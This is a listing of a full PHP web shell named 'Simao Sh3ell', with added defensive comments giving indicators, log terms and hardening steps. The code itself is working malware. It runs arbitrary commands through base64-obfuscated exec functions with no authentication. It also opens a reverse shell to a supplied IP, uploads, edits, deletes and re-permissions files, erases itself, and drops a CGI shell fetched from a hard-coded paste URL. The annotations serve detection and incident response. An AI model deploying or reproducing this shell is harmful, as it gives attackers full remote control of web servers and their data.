simaosec

Simao404 shell

Aug 5th, 2017
  1. <?php
  2.  
  // Analyst note (defensive annotation): this listing is a PHP web shell. No handler in the
  // file checks a password, a session value or the client address before acting on request
  // parameters, so anyone who can reach the URL gets every capability shown below.
  // The page title below is a constant string and therefore usable as a content signature.
  3. echo '<title>SIMAO Sh3ell</title>';
  4.  
  // A session is started (errors suppressed with @), but nothing in the file reads $_SESSION.
  5. @session_start();
  6.  
  7.  
  8.  
  9.  
  10.  
  // Host fingerprinting printed on every request: the kernel/OS string from php_uname(),
  // the owner of the script file from get_current_user(), the PHP version, and the total and
  // free disk space of "/" in GB.
  11. echo "<fontstyle=\"  position: center;
  12.    right: 0px;
  13.    left: 0px;
  14.    top: 0px;\" >
  15.    <font color= #0000FF>kernel </font>~ :: ";
  16. echo php_uname();
  17. echo " <br> <font color= #0000FF> user </font>~ ::";
  18. echo "(".get_current_user().")";
  19. echo " <br> <font color= #0000FF>php_verion</font> ~ ::";
  20. echo phpversion();
  21. echo " <br> <font color= #0000FF>hdd </font>~ ::";
  22. echo round(disk_total_space("/") / (1024*1024*1024) ,2).".GB".":|:free space ~".round(disk_free_space("/") / (1024*1024*1024),2).".GB";
  23.  
  24. echo "</font>
  25.  
  26.  
  27. ";
  28.  
  // Static HTML/CSS for the page. The banner text is constant, and the markup ends with a
  // "delete me" button that links to ?killed=kill.
  29. echo '
  30. <HEAD>
  31. <H1><center>[#]  Stealth Sh3ell Simao [#] </center></H1>
  32.  
  33. <style>
  34. body{
  35. font-family: "Courier New";
  36. background-color: #f6f5f5;
  37. }
  38. </style>';
  39. echo " <style>
  40. p.rigth
  41. {
  42.      
  43.        position: absolute;
  44.    right: 0px;
  45.    top: 0px;
  46.    padding: 10px;
  47.      
  48. }
  49. .button {
  50.    background-color: red;
  51.    border: none;
  52.    color: white;
  53.    padding: 10px 20px;
  54.    text-align: center;
  55.    text-decoration: none;
  56.    display: inline-block;
  57.    margin: 4px 2px;
  58.    cursor: pointer;
  59. }
  60. .button1 {font-size: 11px;}
  61. </style>
  62. <p class=rigth> <a href=?killed=kill> <button class='button button1'> delete me </button></a></p>";
  63.  
  // Routing is by the mere presence of a query parameter: ?killed calls msh_lkhra()
  // (self-removal) and ?cgi calls cgidzb() (writes a CGI script). The parameter values are
  // never inspected. These parameter names are useful search terms for web access logs.
  64. if (isset($_GET['killed']))
  65. {
  66.      msh_lkhra();
  67. }
  68. if (isset($_GET['cgi']))
  69. {
  70.     cgidzb();
  71. }
  // msh_lkhra(): self-removal handler reached through ?killed.
  // Without POST field "yes" it prints a confirmation form and stops. With it, the script
  // unlinks its own file name (basename(__FILE__), so the path is resolved against the current
  // working directory) and stops. The exit after die() is never reached.
  // Incident-response note: because the sample can erase itself, a missing file does not
  // rule out earlier use; web access logs and file-system timestamps remain the evidence.
  72. function msh_lkhra()
  73. {
  74.      
  75.       if(isset($_POST['yes']))
  76.       {
  77.       @unlink(basename(__FILE__));
  78.       die("<center> <h1> ~ sh3ell deleted ~ </h1></center>");
  79.       exit;
  80.       }
  81.       else
  82.       {
  83.         die("<center> <form method=post><input type=submit name=yes value='yes Delete it'></center>");
  84.       }
  85.  
  86. }
  // Upload handler. When POST field "updzb" is present and a file arrived in field "torabi",
  // the file is moved to the client-supplied name as a relative path, with no check of
  // extension, type or size, and that name is echoed into the page without HTML escaping.
  // When "updzb" is absent the upload form is printed instead.
  // Hardening that defeats this step: keep web-writable directories non-executable, and turn
  // off file_uploads where the application does not need uploads.
  87. if (isset($_POST['updzb']))
  88. {
  89.   if (!empty($_FILES['torabi']['name'])){
  90.   $nm = $_FILES['torabi']['name'];
  91.   $tm = $_FILES['torabi']['tmp_name'];
  92.   move_uploaded_file($tm,"".$nm);
  93.   echo "<center> uploaded </br> <a href=$nm>$nm</a></center>";
  94. }
  95. }
  96. else
  97. {
  98.   print("<center><form method=POST enctype='multipart/form-data'> <input type=file name=torabi><input type=submit name=updzb value=up></center>");
  99.  
  100. }
  // ?delete=<path> handler: prints a confirmation form; once POST field "yes" arrives,
  // unlink() is called on the path taken verbatim from the query string, so any file the PHP
  // process is allowed to remove can be removed. The request always ends at the exit below.
  // open_basedir narrows which paths such a call can reach.
  101. if (isset($_GET['delete']))
  102. {
  103.   echo "<form method=post>";
  104.   echo "<center>are u ser to delete this file ?</center>";
  105.   echo "<center> <input type=submit name=yes value=yes></center>";
  106.   if (isset($_POST['yes'])):
  107.  
  108.    unlink($_GET['delete']);
  109.  
  110.   echo "<center> File Deleted :v </br> <a href=?path=".getcwd()."> back !</a></center>";
  111.   endif;
  112.   exit;
  113. }
  // class files: file-manager view. Its single method prints the navigation buttons
  // (?cgi, ?path, ?cmd, ?back), a clickable breadcrumb built from getcwd(), "new_dir" and
  // "new_file" forms, and a listing of the directory named by ?path.
  // NOTE(review): the method shares the class name, which PHP versions before 8.0 treat as a
  // constructor; that is presumably how it runs when `new edite()` executes later in the
  // file. Confirm against the PHP version of the affected host.
  114. class files //class tchof lfiles  files :D
  115. {
  116.     //const simao = "<title> SIMAO404 StEalth Sh3ell </title>";  
  117.     public function files()
  118.     {
  119.          
  120.         //$rc = base64_encode(getcwd());
  121. $get = getcwd();
  122. $di = explode('/',$get); // /var/www/...b /  
  123.  
  // The page pulls a stylesheet from a third-party host; the cwd is interpolated unescaped.
  124. echo " <center><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href=\"https://www.w3schools.com/w3css/4/w3.css\"> <body>  <div class=\"w3-container\"> <a href=?cgi=zby>   <input type=\"button\" class=\"w3-button w3-black\" value=\" [!] cgi sh3ell [!]  \"/> &nbsp;  </a>   <a href=?path=$get > <input type=\"button\" class=\"w3-button w3-black\" value=\" [!] show files [!] \"> &nbsp; </a>   <a href=?cmd=zby> <input type=\"button\" class=\"w3-button w3-black\" value=\"     [!] CMD [!] \"></a>   <a href=?back=conect> <input type=\"button\" class=\"w3-button w3-black\" value=\"                       [!] Back connect [!] \"></a>     </body></center>";
  125. echo "<center>";
  126.  
  // Breadcrumb: for path component number $num, emit a link whose ?path value is the
  // components 0..$num joined with "/".
  127. foreach ($di as $num => $pat) {
  128.  
  129.    
  130.     echo "<a href=?path=";
  131.     for ($i=0; $i<=$num; $i++)
  132.     {
  133.    
  134.     echo ($di[$i])."/";
  135.      }
  136.  
  137.     echo ">$pat/</a>";
  138.  
  139.    echo '</td></tr><tr><td>';
  140.  
  141.      } echo " <form method=post> <input style='font-size: 11px;' type=submit name=creatdir value=new_dir>  ";
  // Directory creation: when POST field "creatdir" is present, mkdir() runs on POST field
  // "filname" with warnings suppressed; the inner isset() repeats the outer test. The
  // request ends at exit.
  142.  if(isset($_POST['creatdir']))
  143.    
  144.     {
  145.  
  146.         echo "<center> <form method=post> <br> <input type=text name=filname placeholder='newdir'> <br></br><input type=submit name=creatdir value=create></center>";
  147.  
  148.         if (isset($_POST['creatdir']))
  149.         {
  150.            
  151.             if(@mkdir(@$_POST['filname'])):
  152.                  print("<center> dir created </center>");
  153.  
  154.             endif;
  155.         }
  156.         exit;
  157.         //exit;
  158.     }
  159.    
  160.     echo " <form method=post> <input type=submit style='font-size: 11px;'name=creatfile value=new_file>  ";
  // File creation: same shape as above, using fopen(..., "a") on POST field "filname".
  // The returned handle is never closed explicitly.
  161.  if(isset($_POST['creatfile']))
  162.    
  163.     {
  164.  
  165.         echo "<center> <form method=post> <br> <input type=text name=filname placeholder='newfile' > <br></br><input type=submit name=creatfile value=create></center>";
  166.  
  167.         if (isset($_POST['creatfile']))
  168.         {
  169.            
  170.             if(@fopen(@$_POST['filname'],"a")):
  171.                  print("<center> file created </center>");
  172.             endif;
  173.         }
  174.         exit;
  175.     }
  176.    
  177.    
  178.  
  // Directory listing: scandir() on the raw ?path value. Each file gets links carrying
  // ?edite, ?delete, ?rename and ?chmod; each directory gets ?path, ?dirrename and ?deletdir.
  // Names and paths are written into the HTML without escaping. Requests carrying these
  // parameters with file-system paths as values are what this view produces in access logs.
  179.     $a = (@$_GET['path']);
  180.     $z = @scandir($a); //scandir
  181.     if ($z == true)
  182.     {
  183.  
  184.             foreach($z as $lol)
  185.         {
  186.  
  187.          
  188.           if (is_file("$a/$lol")) //$a/$lol = lpath true
  189.           {
  190.  
  191.            if (is_writable("$a/$lol")):
  192.          
  193.              
  194.              
  195.             echo "</br>";
  196.              
  197.             echo " <font color=green> writable -> </font> <a href=?edite=$a/$lol>$lol </a> ".round(filesize("$a/$lol") / 1024,2)." kb"." : =>  <a href=?delete=$a/$lol> <font color='red'> D </font>  <a href=?rename=$a/$lol>   <font color='#FFBF00'> R </font>  </a> <a href=?chmod=$a/$lol> <font color=\"black\"> P </a>";
  198.           else :
  199.             echo "</br>";
  200.              
  201.             echo " <font color=red> not writable -> </font>  <a href=?edite=$a/$lol>$lol </a> ".round(filesize("$a/$lol") / 1024,2)." kb"."  : =>  <a href=?delete=$a/$lol> <font color='red'> D </font>  <a href=?rename=$a/$lol>   <font color='#FFBF00'> R </font>  </a> <a href=?chmod=$a/$lol> <font color=\"black\"> P </a>";
  202.             endif;
  203.  
  204.           }
  205.           elseif(is_dir("$a/$lol"))
  206.           {
  207.            
  208.             echo "</br>";
  209.             echo " dir~ <a href=?path=$a/$lol> <font color=#0B6121 >[$lol]</font ></a> <a href=?dirrename=$a/$lol> <font color=black > R </a> </a> <a href=?deletdir=$a/$lol> <font color=red > D</font> </a> ";
  210.           }
  211.  
  212.  
  213.         }
  214. }
  215.     echo "</center>";
  216.  
  217.     }
  218. }
  219.  
  220.  
  221.  
  // class dir_or_file: adds the file-edit handler on top of class files.
  // chek() acts only when ?edite=<path> is present. It shows the file's contents, HTML-escaped,
  // in a textarea; on POST field "chang" it overwrites the same path with POST field
  // "chngfile" through file_put_contents(). Read and write errors are suppressed with @.
  // Incident-response note: any file writable by the PHP process could have been altered
  // through this handler, so application files need an integrity check once this sample is found.
  222. class dir_or_file extends files //extend dzb
  223. {
  224.  
  225.   public function chek()
  226.   {
  227.     if (isset($_GET['edite']))
  228.     {    
  229.         //echo parent::simao;
  230.         $z = $_GET['edite'];
  231.         echo "<form method=post> <center><br> <textarea style='width: 720px; height: 260px' name=chngfile >".htmlspecialchars(  @file_get_contents($z))."</textarea> <br><input type=submit name=chang value='edite'><br> </center>";
  232.         if(isset($_POST['chang'])):
  233.        
  234.  
  // Success is judged by the truthiness of the byte count returned by file_put_contents(),
  // so writing zero bytes takes the error branch.
  235.         if(@file_put_contents($z,$_POST['chngfile'])):
  236.         echo "<br><center> <font color=green> file changed :D</font></center>";
  237.         $f = getcwd();
  238.         exit(@header("Location:?path=$f"));
  239.         else:
  240.             echo "<br><center> <font color=red> error edite file  </font></center>";
  241.         //echo "</textarea></center>";
  242.         endif;
  243.         endif;
  244.        
  245.     }
  246.   }
  247. }
  248.  
  249.  
  // class edite: leaf of the files -> dir_or_file -> edite chain. It adds only the public
  // property $ok, which nothing else in the file reads or writes.
  250. class edite extends dir_or_file //exte
  251. {
  252.  
  253.     public $ok;
  254.  
  255.    
  256. }
  257.  
  258.  
  259.  
  260.  
  261.  
  // Runs on every request: build the class chain, then call the ?edite handler.
  262. $z = new edite();
  263.  
  264. $z->chek();
  // back_con(): "back connect" (reverse shell) handler reached through ?back.
  // It pre-fills a form with the requester's REMOTE_ADDR and port 21. On POST field "con" it
  // opens an outbound TCP connection to the POSTed ip/port with fsockopen() (20 s timeout),
  // starts `/bin/sh -i` through proc_open(), and copies bytes between the socket and the
  // child's stdin/stdout/stderr pipes.
  // Defender view: the observable artifacts are an outbound connection opened by the web
  // server worker and an interactive sh child of the PHP process. Egress filtering on the web
  // tier, and proc_open/fsockopen in php.ini disable_functions, stop this handler.
  265. function back_con()
  266. {
  267.     $ip = $_SERVER['REMOTE_ADDR'];
  268.     echo "<center> [?] b3ack conect [?] <form method=post> </br></br> your ip :: <input type=text name=ip value=$ip> port :: <input type=text name=port value=21> &nbsp; <input type=submit name=con value=con3ect>";
  269.     $addr = @$_POST['ip'];
  270.     $por = @$_POST['port'];
  271.     if (isset($_POST['con']))
  272.     {
  273.  
  274.  
  275.                $sock = @fsockopen($addr,$por,$errno,$errstr,20);
  276.                if (!$sock):
  277.                 echo "<br> error in conect or fsockopen desabled";
  278.                exit;
  279.                endif;
  280. if ($sock)
  281. {
  // Pipe layout for the child: 0 = stdin (child reads), 1 = stdout, 2 = stderr (child writes).
  282. $descriptorspec = array(
  283.    0 => array("pipe", "r"),  
  284.    1 => array("pipe", "w"),
  285.    2 => array("pipe","w")  
  286. );
  287.      
  288.  
  289.  
  290. $process = proc_open("/bin/sh -i", $descriptorspec, $pipes);
  291.  
  292. if (is_resource($process)) {
  293.    
  294.      
  // Relay loop with no break: it ends only through the exit below, when the child's stdout
  // reaches EOF. proc_close() further down is therefore reached only if proc_open() failed.
  295.   while (true) {
  296.    
  297.    
  298.  
  299.  
  300.    
  301.     if (feof($pipes[1])) {
  302.         echo "</br>";
  303.         print("Connection terminated atbi ");
  304.         exit;
  305.     }
  306.  
  // Blocks (null timeout) until the socket or one of the child's output pipes is readable.
  307.     $read_a = array($sock, $pipes[1], $pipes[2]);
  308.     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  309.  
  310.    
  // socket -> child stdin
  311.     if (in_array($sock, $read_a)) {
  312.          
  313.         $input = fread($sock,true);
  314.          
  315.         fwrite($pipes[0], $input);
  316.     }
  317.  
  318.    
  // child stdout -> socket
  319.     if (in_array($pipes[1], $read_a)) {
  320.          
  321.         $input = fread($pipes[1],true);
  322.          
  323.         fwrite($sock, $input);
  324.     }
  325.  
  326.    
  // child stderr -> socket
  327.     if (in_array($pipes[2], $read_a)) {
  328.          
  329.         $input = fread($pipes[2],true);
  330.          
  331.         fwrite($sock, $input);
  332.     }
  333. }
  334. }
  335. proc_close($process);
  336.  
  337. }
  338.     }
  339. }
  // ?dirrename=<path> handler: prints a form pre-filled (unescaped) with the path; on POST
  // field "ren" it calls rename() from the query-string path to POST field "newdir", with
  // errors suppressed, then stops at die(). The exit(header(...)) after die() is unreachable.
  340. if (isset($_GET["dirrename"]))
  341. {  
  342.     $dirone = @$_GET["dirrename"];
  343.     echo "<center> </br> <form method=post > old_name ::<input style='width:333px;' type=text name=direone value=$dirone> &nbsp; rename to :: <input style='width:333px;' type=text name=newdir value=$dirone>&nbsp; <input type=submit name=ren value='rename'></center>";
  344.     $newnamedir = @$_POST["newdir"];
  345.     if (isset($_POST["ren"]))
  346.    
  347.        
  348.     {
  349.        
  350.         @rename("$dirone","$newnamedir");
  351.         die("<center></h1> <font color=green>renamed </font></h1></center>");
  352.         exit(@header("Location:?path="));
  353.     }
  354. }
  355.  
  // cgidzb(): CGI dropper reached through ?cgi.
  // Steps visible in the code: create and enter a directory named "Simao"; write an .htaccess
  // that maps the ".sa" extension to the cgi-script handler and serves .php as text/plain;
  // fetch a base64 blob from the hard-coded paste URL below, decode it, write it to
  // "simao.sa" and chmod it 0755; print a link to the new file and exit. The fetched payload
  // is not part of this listing, so its behaviour cannot be stated from here.
  // Defender view: the directory name, the two file names, the .htaccess body and the
  // outbound request to the paste host are indicators to search for. The step depends on
  // per-directory overrides and remote URL opening being permitted, so `AllowOverride None`
  // on web-writable paths and allow_url_fopen=Off both break it.
  356. function cgidzb()
  357. {
  358.     @mkdir("Simao");
  359.     @chdir("Simao");
  360.     $f = fopen(".htaccess","w") or die("error in open file :/");
  361.     $d = "Options all
  362. DirectoryIndex Sux.html
  363. AddType text/plain .php
  364. AddType application/x-httpd-cgi .sa
  365. AddHandler server-parsed .php
  366. AddHandler cgi-script .sa
  367. AddHandler cgi-script .sa";
  368.  
  369.    fwrite($f,$d);
  370.    fclose($f);
  // The result of the remote fetch is not checked before it is decoded and written out.
  371.    $cgi = file_get_contents("https://pastebin.com/raw/BjVAmEbR");
  372.    $cgi_data = base64_decode($cgi);
  373.    $yawyaw = "simao.sa";
  374.    $gg = fopen($yawyaw,"w+") or die("error in open the sh3ll");
  375.    fwrite($gg,$cgi_data);
  376.    fclose($gg);
  377.    @chmod($yawyaw,0755);
  378.    echo '<center><br><a href=Simao/simao.sa> <font color=black >[+] :D fk yeah cgi sh3ell created [+]</font></br></a><center>';
  379.    exit;
  380. }
  381.  
  382.  
  383.  
  384.  
  // shells(): command-execution handler reached through ?cmd.
  // The four candidate function names are stored base64-encoded, so the literal names do not
  // appear in the file; they decode to shell_exec, passthru, system and exec. The first one
  // that function_exists() reports is called with POST field "cm", and its output is written
  // into a textarea without escaping. If none exists, the message in $mo is printed.
  // The switch compares the non-empty string $mo loosely against each boolean case value, so
  // a case matches exactly when its function_exists() call returned true.
  // Defender view: the base64 literals are stable content signatures for file scanning, and
  // listing these four functions in php.ini disable_functions prevents the calls from running.
  385. function shells() ////////////////// hna exec
  386. {
  387. $mo = "<center> no function to exec found in sv  :/ </center>";
  388. switch($mo)
  389. {
  390.  
  391.    
  // base64 literal decodes to "shell_exec"
  392.   case(function_exists(base64_decode("c2hlbGxfZXhlYw=="))):
  393.   $se = base64_decode("c2hlbGxfZXhlYw==");
  394.   echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
  395.     echo "<center><textarea style='color: green; width:800;height: 280px; '> ".$se(@$_POST['cm'])."</textarea></center>";
  396.   break;
  // base64 literal decodes to "passthru"
  397.   case(function_exists(base64_decode("cGFzc3RocnU="))):
  398.   $pt = base64_decode("cGFzc3RocnU=");
  399.   echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
  400.     echo "<center><textarea style='color: green; width:800;height: 280px;'> ";
  401.     echo @$pt(@$_POST['cm']);
  402.     echo "</textarea></center>";
  403.     break;
  // base64 literal decodes to "system"
  404.     case(function_exists(base64_decode("c3lzdGVt"))):
  405.     $sy = base64_decode("c3lzdGVt");
  406.     echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
  407.     echo "<center><textarea style='color: green; width:800;height: 280px;'> ";
  408.     @$sy(@$_POST['cm']);
  409.     echo "</textarea></center>";
  410.     break;
  // base64 literal decodes to "exec"
  411.     case(function_exists(base64_decode("ZXhlYw=="))):
  412.     $ex = base64_decode("ZXhlYw==");
  413.     echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
  414.     echo "<center><textarea style='color: green; width:800;height: 280px;'> ";
  415.     echo @$ex(@$_POST['cm']);
  416.     echo "</textarea></center>";
  417.     break;
  418.     default:
  419.   echo $mo;
  420. }
  421. }
  // Remaining routing, again keyed only on which query parameter is present:
  // ?back -> back_con(), ?cmd -> shells(), ?chmod -> chmd(), ?rename -> ethic().
  // ?deletdir calls rmdir() directly on the path supplied in the query string.
  // Together with ?killed, ?cgi, ?path, ?edite, ?delete and ?dirrename handled elsewhere in
  // the file, these parameter names are the request vocabulary to look for in access logs.
  422. if (isset($_GET['back']))
  423. {
  424.     back_con();
  425. }
  426. if (isset($_GET['cmd']))
  427. {
  428.   shells();
  429.   exit;
  430. }
  431. if (isset($_GET["chmod"]))
  432. {
  433.     chmd();
  434.     exit;
  435. }
  436. //echo edite::simao;
  437.  
  438. if (isset($_GET['deletdir']))
  439. {
  440.     $the_dir = @$_GET['deletdir'];
  441.     if(rmdir($the_dir)):
  442.        echo "<center> dir deleted </center>";
  443.     endif;
  444. }
  445.  
  446. if (isset($_GET['rename']))
  447. {
  448. ethic();
  449. }
  450.  
  // ethic(): file-rename handler reached through ?rename.
  // Prints a form whose two fields are pre-filled (unescaped) with the ?rename value. On POST
  // field "rn" it calls rename() with both the old and the new path taken from the POST body,
  // so the path in the query string is only a default. The request always ends at exit.
  451. function ethic()
  452. {
  453.   echo "<center>";
  454.   echo "<form method=post>";
  455.   echo "the old name : "."<input style='width:400;' type=text name='oldfile' value=".@$_GET["rename"]."></br>";
  456.   echo "nut name azby :"."<input style='width:400;'type=text name='newfile' value=".@$_GET["rename"]." >
  457.       <br><input type=submit name=rn value='rename'>";
  458.   if (isset($_POST['rn'])):
  459.  
  460.   $old = @$_POST['oldfile'];
  461.  
  462.   $new = @$_POST['newfile'];
  463.   rename($old,$new);
  464.   echo "<font color=red > file renamed to $new </font> <br> <a href=?path=".getcwd()."> back !</a> ";
  465.  
  466.     endif;
  467.     echo "</center>";
  468.     exit;
  469.  
  470. }
  // chmd(): permission-change handler reached through ?chmod.
  // Prints a form pre-filled (unescaped) with the ?chmod path. On POST field "pr" it calls
  // chmod() on that path with POST field "prem"; errors are suppressed and "primis changed"
  // is printed whether or not the call succeeded.
  // Incident-response note: unexpected permission bits on files under the web root are one
  // trace this handler can leave behind.
  471. function chmd()
  472. {
  473.     $hh = @$_GET["chmod"];
  474.  
  475.     echo "<br><center>";
  476.     echo "<form method=POST> file ::<input style='width:300px;' type=text name=old_pr value=$hh> to  prems ::<input style='width:45px;' type=text name=prem placeholder='0666'> <input type=submit name=pr value=change >" ;
  477.     if (isset($_POST['pr']))
  478.     {
  479.         $p = @$_POST['prem'];
  480.     @chmod($hh,$p);
  481.     echo "primis changed";
  482. }
  483.     echo "</center>";
  484. }
  485.  /*echo "<font style=\"  position: absolute;
  486.     right: 0px;
  487.     left: 0px;
  488.     top: 0px;\" > krenek ~ ".php_uname()."</font>
  489. }
  490.  
  491. ";
  492. */
  493.  
  494. ?>